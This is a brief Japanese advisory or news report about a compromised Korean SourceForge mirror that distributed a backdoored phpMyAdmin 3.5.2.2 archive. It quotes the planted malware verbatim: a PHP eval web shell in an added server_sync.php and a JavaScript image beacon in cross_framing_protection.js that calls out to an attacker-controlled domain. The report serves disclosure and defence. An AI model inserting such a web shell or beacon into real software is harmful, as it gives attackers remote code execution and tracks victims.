9月25日、韓国のミラーの1つであるSourceForge(cdnetworks-kr-1)が侵害されたことが判明しました。
このミラーにある
phpMyAdmin-3.5.2.2-all-languages.zipアーカイブにバックドアが導入されました。
次のコードを含む
server_sync.phpファイルが
アーカイブに追加されました。
<?php @eval($_POST['c']);?>
任意のコードの実行を許可します。
また、
js / cross_framing_protection.jsファイルが変更され、コードが追加されました。
var icon ; icon = document.createElement("img"); icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg"; icon.width=0; icon.height=0; document.body.appendChild(icon);
攻撃者は感染したコピーについて知ることができます。
現時点では、侵害されたミラーは回転から除外されています。
SourceForgeのログ記録チームは、このファイルをダウンロードした人が約400人いると判断しました。 ダウンロードしたすべての人に特定できる警告が送信されました。
この脆弱性の悪用はMetasploitパッケージに既に含まれています。
ソース:韓国語のミラーサーバーでphpMyAdminのコピーが破損しているPMASA-2012-5侵害されたSourceForgeミラーphpmyadminバックドアのエクスプロイトを追加